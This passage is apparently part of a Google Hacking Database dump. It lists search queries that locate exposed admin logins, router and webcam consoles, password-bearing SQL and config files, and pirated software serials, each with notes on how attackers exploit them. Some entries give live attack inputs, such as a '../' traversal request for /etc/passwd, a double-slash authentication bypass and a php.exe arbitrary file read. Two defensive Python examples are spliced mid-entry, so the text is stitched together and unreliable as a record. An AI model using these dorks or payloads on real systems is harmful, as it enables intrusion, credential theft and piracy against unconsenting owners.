With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Ainstall.php+intitle%3AphpMySearch&btnG=Search[url]] [[dork]inurl:install.php intitle:phpMySearch[dork]] [end][275]] [[start][277] [[title]filetype:r2w r2w[[title]] [[descr]WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products.

Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems, for example. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Ar2w+r2w&btnG=Search[url]] [[dork]filetype:r2w r2w[dork]] [end][277]] [[start][278] [[title]filetype:php inurl:vAuthenticate[[title]] [[descr]vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts and new user groups, activating/inactivating groups or individual accounts, setting user level, etc.

There are two admin users by default with an easy-to-guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.

An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the software. This software doesn't enforce such a rule.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3AvAuthenticate&btnG=Search[url]] [[dork]filetype:php inurl:vAuthenticate[dork]] [end][278]] [[start][279] [[title]intitle:"ZyXEL Prestige Router" "Enter password"[title]] [[descr]This is the main authentication screen for the ZyXEL Prestige Router.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ZyXEL+Prestige+Router%22+%22Enter+password%22+[url]] [[dork]intitle:"ZyXEL Prestige Router" "Enter password" [dork]] [end][279]] [[start][280] [[title]"Welcome to the Prestige Web-Based Configurator"[title]] [[descr]This is the configuration screen for a Prestige router. This page indicates that the router has not yet been set up and any web user can make changes to the router.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Welcome+to+the+Prestige+Web-Based+Configurator%22+[url]] [[dork]"Welcome to the Prestige Web-Based Configurator" [dork]] [end][280]] [[start][281] [[title]intitle:"ADSL Configuration page"[title]] [[descr]This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firmware version of the modem. Attackers can use this information to formulate an attack.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ADSL+Configuration+page%22[url]] [[dork]intitle:"ADSL Configuration page"[dork]] [end][281]] [[start][282] [[title]"Version Info" "Boot Version" "Internet Settings"[title]] [[descr]This is the status page for a Belkin Cable/DSL gateway. 
Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack. [descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Version+Info%22+%22Boot+Version%22+%22Internet+Settings%22[url]] [[dork]"Version Info" "Boot Version" "Internet Settings"[dork]] [end][282]] [[start][283] [[title]filetype:sql +"IDENTIFIED BY" -cvs[[title]] [[descr]Database maintenance is often automated by use of .sql files which may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.

An attacker can use these files to acquire database permissions that normally would not be given to the masses.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+%2B%22IDENTIFIED+BY%22+-cvs&btnG=Search[url]] [[dork]filetype:sql +"IDENTIFIED BY" -cvs[dork]] [end][283]] [[start][284] [[title]filetype:sql password[[title]] [[descr]Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.

An attacker can use these files to acquire database permissions that normally would not be given to the masses.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+password&btnG=Search[url]] [[dork]filetype:sql password[dork]] [end][284]] [[start][286] [[title]"ttawlogin.cgi/?action="[title]] [[descr]Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company.

Tarantella also has a few security issues; for a list of possible things that a malicious user could try to do, have a look at -
http://www.tarantella.com/security/index.html

An example of what a malicious user could try is
http://www.tarantella.com/security/bulletin-03.html
the exploit isn't included in the User-Notice, but I've worked it out to be something like
install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
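A traversal attempt of the shape sketched above is exactly the kind of request a defender can pick out of ordinary web-server access logs. The following is an added example written for this edit, not Tarantella's code and not part of the original GHDB entry: it parses a few constructed Apache combined-format log lines (addresses, paths and timestamps are made up) and flags "../" sequences, including percent-encoded and double-percent-encoded forms, doubled slashes in the path component (the normalisation trick the Axis camera entry later in this list describes) and double-encoded targets, then narrows the list to requests the server actually answered with a 2xx status.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines; addresses and paths are illustrative only.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2006:12:00:01 +0000] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../etc/passwd HTTP/1.0" 200 1830 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Jun/2006:12:00:02 +0000] "GET /admin/admin.shtml HTTP/1.1" 401 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Jun/2006:12:00:03 +0000] "GET //admin/admin.shtml HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Jun/2006:12:00:04 +0000] "GET /view/indexFrame.shtml HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2006:12:00:05 +0000] "GET /cgi-bin/show.cgi?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)


def path_component(target):
    """Path part of a request target, with scheme and host removed for absolute-form requests."""
    path = target.split("?", 1)[0]
    if "://" in path:                       # proxy-style "GET http://host/path"
        rest = path[path.index("://") + 3:]
        path = rest[rest.find("/"):] if "/" in rest else "/"
    return path


def classify(target):
    """List the suspicious features of one request target (empty list means nothing found)."""
    flags = []
    once = unquote(target)
    decoded = unquote(once).lower()         # second pass catches %252e-style double encoding
    if "../" in decoded or "..\\" in decoded:
        flags.append("traversal")
    if "//" in path_component(target):
        flags.append("double-slash")
    if once != target and "%" in once:
        flags.append("double-encoding")
    return flags


def scan_log(text):
    """Return (ip, target, status, flags) for every request that trips at least one check."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        flags = classify(m.group("target"))
        if flags:
            hits.append((m.group("ip"), m.group("target"), int(m.group("status")), flags))
    return hits


def successful_hits(text):
    """The subset that the server answered with 2xx: the ones worth paging someone for."""
    return [h for h in scan_log(text) if 200 <= h[2] < 300]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The status filter matters more than the pattern match: scanners generate traversal noise all day, but a "../../etc/passwd" request that came back 200 with a plausible body size is a confirmed read, not an attempt.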
[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][286]] [[start][287] [[title]Axis Network Cameras[[title]] [[descr]The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml which can easily be found by searching Google.

An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.

Securityfocus(www.securityfocus.com):
----------------------------------------------------
"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution."

Core Security Technologies Advisory
(http://www.coresecurity.com):
---------------------------------------------------

"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for "admin" is bypassed and an attacker gains direct access to the configuration.
[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3AindexFrame.shtml+Axis&btnG=Google+Search[url]] [[dork]inurl:indexFrame.shtml Axis[dork]] [end][287]] [[start][288] [[title]POWERED BY HIT JAMMER 1.0![[title]] [[descr]Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typically used by the underground sites on the Net who "pay for surfing ads" and advertise spam services or software.

An attacker can find these sites by searching for the typical "powered by hit jammer !" phrase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel.

Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice.
[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=POWERED+BY+HIT+JAMMER+1.0%21&btnG=Google+Search[url]] [[dork]POWERED BY HIT JAMMER 1.0![dork]] [end][288]] [[start][291] [[title]intitle:"Welcome Site/User Administrator" "Please select the language" -demos[[title]] [[descr]Service providers worldwide use Ensim's products to automate the management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.

Ensim uses a control panel GUI to manage the servers. It has four levels of privileges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only.

A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+Site%2FUser+Administrator%22+%22Please+select+the+language%22+-demos&btnG=Search[url]] [[dork]intitle:"Welcome Site/User Administrator" "Please select the language" -demos[dork]] [end][291]] [[start][292] [[title]filetype:pwd service[[title]] [[descr]Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they were hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google.

An attacker can simply take advantage of administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apwd+service&btnG=Search[url]] [[dork]filetype:pwd service[dork]] [end][292]] [[start][293] [[title]94FBR "ADOBE PHOTOSHOP"[title]] [[descr]94FBR is part of many serials. A malicious user would only have to change the program name (photoshop in this example) in this search to find a perfectly valid serial.

Other values to look for are: GC6J3, GTQ62, FP876, D3DX8. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=94FBR+%22ADOBE+PHOTOSHOP%22&btnG=Search[url]] [[dork]94FBR "ADOBE PHOTOSHOP"[dork]] [end][293]] [[start][294] [[title]inurl:zebra.conf intext:password -sample -test -tutorial -download[[title]] [[descr]GNU Zebra is free software that manages TCP/IP based routing protocols. It supports the BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.

The zebra.conf uses the same format as the Cisco config files. There is an enable password (plain text or encrypted) and IPv6 tunnel definitions, hostnames, Ethernet interface names, IP routing information, etc. [descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Azebra.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Google+Search[url]] [[dork]inurl:zebra.conf intext:password -sample -test -tutorial -download[dork]] [end][294]] [[start][295] [[title]inurl:ospfd.conf intext:password -sample -test -tutorial -download[[title]] [[descr]GNU Zebra is free software that manages TCP/IP based routing protocols. It supports the BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.

The ospfd.conf uses the same format as the Cisco config files. There is an enable password (plain text or encrypted) and IPv6 tunnel definitions, hostnames, Ethernet interface names, IP routing information, etc.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aospfd.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Search[url]] [[dork]inurl:ospfd.conf intext:password -sample -test -tutorial -download[dork]] [end][295]] [[start][296] [[title]intitle:"Index of /" modified php.exe[[title]] [[descr]PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting "/php/php.exe?c:\boot.ini."descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+%2F%22+modified+php.exe&btnG=Search[url]] [[dork]intitle:"Index of /" modified php.exe[dork]] [end][296]] [[start][301] [[title]intitle:"Error using Hypernews" "Server Software"[title]] [[descr]HyperNews is a cross between the WWW and Usenet News. Readers can browse through the messages written by other people and reply to those messages.

This search reveals the server software, server OS, server account user:group (Unix), and the server administrator email address. Many of these messages also include a traceback of the files and line numbers and a listing of the CGI ENV variables. An attacker can use this information to prepare an attack either on the platform or the script files.

[descr]] [[url]http://www.google.com/search?q=intitle:%22Error+using+Hypernews%22+%22Server+Software%22&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0[url]] [[dork]intitle:"Error using Hypernews" "Server Software"[dork]] [end][301]] [[start][302] [[title]inurl:ccbill filetype:log[[title]] [[descr]CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word "hot" in this context seems appropriate when considering the type of sites that use e-tickets :)

CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3Accbill[url]] [[dork]filetype:log inurl:ccbill[dork]] [end][302]] [[start][303] [[title]filetype:mdb inurl:users.mdb[[title]] [[descr]Everyone has this problem: we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database.

An attacker can find and download those mdb files easily with Google. This search tries to find such "user" databases. Some are password protected, many are not. Weee! [descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Amdb+inurl%3Ausers.mdb&btnG=Google+Search[url]] [[dork]filetype:mdb inurl:users.mdb[dork]] [end][303]] [[start][304] [[title]filetype:cfg ks intext:rootpw -sample -test -howto[[title]] [[descr]Anaconda is the installer for Red Hat-based Linux distributions, comparable to YaST on SUSE Linux; its kickstart (ks.cfg) answer files carry the rootpw line. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.

There are more ks configs than you might expect and with a bit of searching through the result list an attacker can find the root password and own that system.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][304]] [[start][306] [[title]allinurl:".nsconfig" -sample -howto -tutorial[[title]] [[descr]Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.

These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content).[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=allinurl%3A%22.nsconfig%22+-sa[url]] [[dork]allinurl:".nsconfig" -sa[dork]] [end][306]] [[start][308] [[title]filetype:php inurl:"viewfile" -"index.php" -"idfil[[title]] [[descr]Programmers do strange things sometimes and forget about security. This search is the perfect example. These php scripts are written for viewing files in the web directory (e.g. ww.XXX.com/viewfile.php?my_howto.txt --> will show you the my_howto.txt).
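The viewfile pattern this entry describes fails because the script joins a user-supplied name onto the web root and opens the result without checking where it ended up. The following is an added example written for this edit, in Python rather than the PHP the entry is about, and not code from any viewfile.php in the wild: it shows the buggy pattern and a hardened resolver side by side, run against a throw-away directory tree built on the fly (file names and contents are made up), so the traversal request that the buggy version serves is refused by the safe one.

```python
import os
import shutil
import tempfile


def view_file_vulnerable(webroot, requested):
    """The buggy pattern: join the user-supplied name onto the web root and open it, no checks."""
    with open(os.path.join(webroot, requested), "rb") as f:
        return f.read()


def resolve_under_root(webroot, requested):
    """Absolute path for `requested` if it stays inside `webroot` after symlink and '..' resolution, else None."""
    root = os.path.realpath(webroot)
    # Leading separators are stripped so os.path.join cannot be redirected to an absolute path.
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/\\")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def view_file_safe(webroot, requested):
    """Hardened form: refuse anything that resolves outside the web root or is not a regular file."""
    path = resolve_under_root(webroot, requested)
    if path is None or not os.path.isfile(path):
        raise PermissionError("refused: %r does not resolve to a file under %s" % (requested, webroot))
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Build a throw-away tree and run the same two requests through both versions."""
    base = tempfile.mkdtemp()
    try:
        root = os.path.join(base, "htdocs")
        os.mkdir(root)
        with open(os.path.join(root, "my_howto.txt"), "w") as f:
            f.write("public howto\n")
        with open(os.path.join(base, "secret.conf"), "w") as f:   # one level above the web root
            f.write("db_password=hunter2\n")
        results = {
            "vuln_ok": view_file_vulnerable(root, "my_howto.txt"),
            "vuln_traversal": view_file_vulnerable(root, "../secret.conf"),   # leaks the secret
            "safe_ok": view_file_safe(root, "my_howto.txt"),
        }
        try:
            view_file_safe(root, "../secret.conf")
            results["safe_traversal"] = "served"
        except PermissionError:
            results["safe_traversal"] = "refused"
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Resolving with realpath before the containment check is the important part: a string filter for "../" misses percent-encoded input and symlinks that point outside the tree, whereas comparing the resolved path's prefix against the resolved root catches both. The same shape works in PHP with realpath() and a strpos() prefix check.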

An attacker can check for buggy php scripts which allow you to view any file on the system (with the webserver's permissions). Try the good, old directory traversal trick: "../../../". You have to know the filename and location, but that's not a big problem (/etc/passwd anyone ?).[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22viewfile%22+-%22index.php%22+-%22idfil&btnG=Google+Search[url]] [[dork]filetype:php inurl:"viewfile" -"index.php" -"idfil[dork]] [end][308]] [[start][309] [[title]Outlook Web Access (a better way)[[title]] [[descr]According to Microsoft "Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. "

Now, consider for a moment and you will understand why this could be potentially bad.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=active&q=inurl%3A%22exchange%2Flogon.asp%22+OR+intitle%3A%22Microsoft+Outlook+Web+Access+-+Logon%22&btnG=Search[url]] [[dork]inurl:"exchange/logon.asp" OR intitle:"Microsoft Outlook Web Access - Logon"[dork]] [end][309]] [[start][316] [[title]OWA Public folders & Address book[[title]] [[descr]This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.

An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation. [descr]] [[url]http://www.google.com/search?q=inurl:root.asp%3Facs%3Danon&num=100&hl=en&lr=&ie=UTF-8&safe=off&output=search[url]] [[dork]inurl:root.asp?acs=anon[dork]] [end][316]] [[start][317] [[title]Looking Glass[[title]] [[descr]A Looking Glass is a CGI script for viewing results of simple queries executed on remote routers. There are many Looking Glass sites all over the world. Some are password protected, many are not.

An attacker can use this to gather information about the network.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Looking+Glass%22+%28inurl%3A%22lg%2F%22+%7C+inurl%3Alookingglass%29+&btnG=Search[url]] [[dork]"Looking Glass" (inurl:"lg/" | inurl:lookingglass) [dork]] [end][317]] [[start][318] [[title]CGI:IRC Login[[title]] [[descr]CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one IRC server and one or more default channels and will not allow access to anything else.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22irc.cgi%22+%7C+intitle%3A%22CGI%3AIRC+Login%22+&btnG=Google+Search[url]] [[dork]filetype:cgi inurl:"irc.cgi" | intitle:"CGI:IRC Login" [dork]] [end][318]] [[start][319] [[title]filetype:ctt ctt messenger[[title]] [[descr]MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social engineering tricks.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Actt+ctt+messenger&btnG=Search[url]] [[dork]filetype:ctt ctt messenger[dork]] [end][319]] [[start][320] [[title]intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm[[title]] [[descr]ColdFusion error messages logging the SQL SELECT or INSERT statements and the location of the .cfm file on the webserver.

An attacker could use this information to quickly find SQL injection points.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Error+Occurred+While+Processing+Request%22+%2BWHERE+%28SELECT%7CINSERT%29+filetype%3Acfm&btnG=Search[url]] [[dork]intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm[dork]] [end][320]] [[start][321] [[title]ht://Dig htsearch error[[title]] [[descr]The ht://Dig system is a complete world wide web indexing and searching system for a domain or intranet. A list of publically available sites that use ht://Dig is available at http://www.htdig.org/uses.html

ht://Dig 3.1.1 - 3.2 has a directory traversal and file view vulnerability as described at http://www.securityfocus.com/bid/1026. Attackers can read arbitrary files on the system.

If the system is not vulnerable, attackers can still use the error produced by this search to gather information such as administrative email, validation of a cgi-bin executable directory, directory structure, location of a search database file and possible naming conventions.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22htsearch+error%22+ht%3A%2F%2FDig+error&btnG=Search[url]] [[dork]intitle:"htsearch error" ht://Dig error[dork]] [end][321]] [[start][324] [[title]VP-ASP Shopping Cart XSS[[title]] [[descr]VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.

According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.

The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004.

An attacker could also use Google to find unpatched servers.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aasp+inurl%3A%22shopdisplayproducts.asp%22&btnG=Google+Search[url]] [[dork]filetype:asp inurl:"shopdisplayproducts.asp"[dork]] [end][324]] [[start][326] [[title]OWA Public Folders (direct view)[[title]] [[descr]This search looks for Outlook Web Access Public Folders directly. These links open public folders or appointments. Of course there are more ways to find OWA, but the results from this search are different; it just depends which link Google has crawled.

An attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social engineering tricks.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Fpublic%2F%3FCmd%3Dcontents&btnG=Search[url]] [[dork]inurl:/public/?Cmd=contents[dork]] [end][326]] [[start][327] [[title]VP-ASP Shop Administrators only[[title]] [[descr]VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.

It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQL injection, resulting in exposure of confidential customer information like credit card details.

More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&&q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22[url]] [[dork]inurl:"shopadmin.asp" "Shop Administrators only"[dork]] [end][327]] [[start][336] [[title]vBulletin version 3.0.1 newreply.php XSS[[title]] [[descr]vBulletin is a customizable forums package for web sites. It has been written in PHP and is complemented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not in the Edit panel. Malicious code can be injected by an attacker through this flaw.

More information at http://www.securityfocus.com/bid/10612/.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by%3A+vBulletin+*+3.0.1%22+inurl%3Anewreply.php&btnG=Search[url]] [[dork]"Powered by: vBulletin * 3.0.1" inurl:newreply.php[dork]] [end][336]] [[start][337] [[title]Microsoft Money Data Files[[title]] [[descr]Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.

A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called "Passware".
[descr]] [[url]http://www.google.com/search?q=%3Cfiletype:mny+mny%3E&hl=en&lr=&ie=UTF-8&safe=off&filter=0[url]] [[dork][dork]] [end][337]] [[start][338] [[title]Environment vars[[title]] [[descr]This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc.
[descr]] [[url]http://www.google.com/search?q=HTTP_USER_AGENT=Googlebot&ie=UTF-8&oe=UTF-8[url]] [[dork]HTTP_USER_AGENT=Googlebot[dork]] [end][338]] [[start][339] [[title]MySQL tabledata dumps[[title]] [[descr]SQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper.....

Note: this is a cleanup version of an older googledork entry.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22%23+Dumping+data+for+table+%28username%7Cuser%7Cusers%7Cpassword%29%22+-site%3Amysql.com+-cvs&btnG=Search[url]] [[dork]"# Dumping data for table (username|user|users|password)" -site:mysql.com -cvs[dork]] [end][339]] [[start][340] [[title]Welcome to ntop![[title]] [[descr]Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host.

An attacker may use this to gather information about hosts and services behind the firewall.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+to+ntop%21%22&btnG=Search[url]] [[dork]intitle:"Welcome to ntop!"[dork]] [end][340]] [[start][341] [[title]Unreal IRCd[[title]] [[descr]Development of UnrealIRCd began in 1999. Unreal was created from the Dreamforge IRCd that was formerly used by the DALnet IRC Network and is designed to be an advanced IRCd. Unreal can run on several operating systems. Unreal works on most *nix OSes including Linux, BSD, MacOS X, Solaris, and HP-UX. Unreal also works on Windows (95/98/ME NT4/2K/XP/2003).

This search finds configuration files for Unreal IRCd. An attacker can use these to possibly determine the oper password. Be warned that there are samples in the results.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Aunrealircd.conf+-cvs+-gentoo&btnG=Search[url]] [[dork]filetype:conf inurl:unrealircd.conf -cvs -gentoo[dork]] [end][341]] [[start][342] [[title]psyBNC config files[[title]] [[descr]psyBNC is an IRC bouncer with many features. It compiles on Linux, FreeBSD, SunOS and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).

An attacker can use the password, host and port information in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy IRC hostnames that are usually linked to those IP addresses.

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+inurl%3Apsybnc.conf++%22USER.PASS%3D%22&btnG=Search[url]] [[dork]filetype:conf inurl:psybnc.conf "USER.PASS="[dork]] [end][342]] [[start][343] [[title]intitle:"View and Configure PhaserLink"[title]] [[descr]These printers' configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22View+and+Configure+PhaserLink%22&btnG=Search[url]] [[dork]intitle:"View and Configure PhaserLink"[dork]] [end][343]] [[start][344] [[title]intext:"Warning: Failed opening" "on line" "include_path"[title]] [[descr]These error messages reveal information about the application that created them as well as revealing path names, PHP file names, line numbers and include paths.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intext%3A%22Warning%3A+Failed+opening%22+%22on+line%22+%22include_path%22[url]] [[dork]intext:"Warning: Failed opening" "on line" "include_path"[dork]] [end][344]] [[start][345] [[title]filetype:php inurl:"webeditor.php"[title]] [[descr]This is a standard login portal for the webadmin program.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aphp+inurl%3A%22webeditor.php%22[url]] [[dork]filetype:php inurl:"webeditor.php"[dork]] [end][345]] [[start][348] [[title]Panasonic Network Cameras[[title]] [[descr]Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/

